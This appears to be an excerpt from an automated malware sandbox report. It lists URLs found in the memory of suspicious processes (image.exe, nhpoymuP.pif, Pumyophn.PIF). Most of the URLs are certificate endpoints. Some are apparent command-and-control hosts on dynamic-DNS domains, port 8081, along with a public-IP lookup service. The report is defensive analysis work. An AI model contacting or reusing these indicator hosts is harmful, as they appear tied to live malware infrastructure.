Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nhpoymuP.pif, 00000003.00000002.1986029241.000000002F777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndnL
Source: nhpoymuP.pif, 00000003.00000002.1986029241.000000002F78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: nhpoymuP.pif, 00000003.00000002.1986029241.000000002F78B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F777000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A76E000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2962865197.00000000240DD000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.2395212364.0000000028E5E000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: image.exe, 00000000.00000003.1709845321.000000007FCEA000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1744877081.0000000021E00000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1709354096.0000000022711000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.techniqueqatar.com
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A76E000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2962865197.00000000240DD000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: image.exe, 00000000.00000003.1709845321.000000007FCEA000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1744877081.0000000021E00000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1709354096.0000000022711000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif.0.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: image.exe, 00000000.00000003.1709845321.000000007FCEA000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1744877081.0000000021E00000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1709354096.0000000022711000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1745877801.00000000227BB000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif.0.dr	String found in binary or memory: http://www.pmail.com0
Source: nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
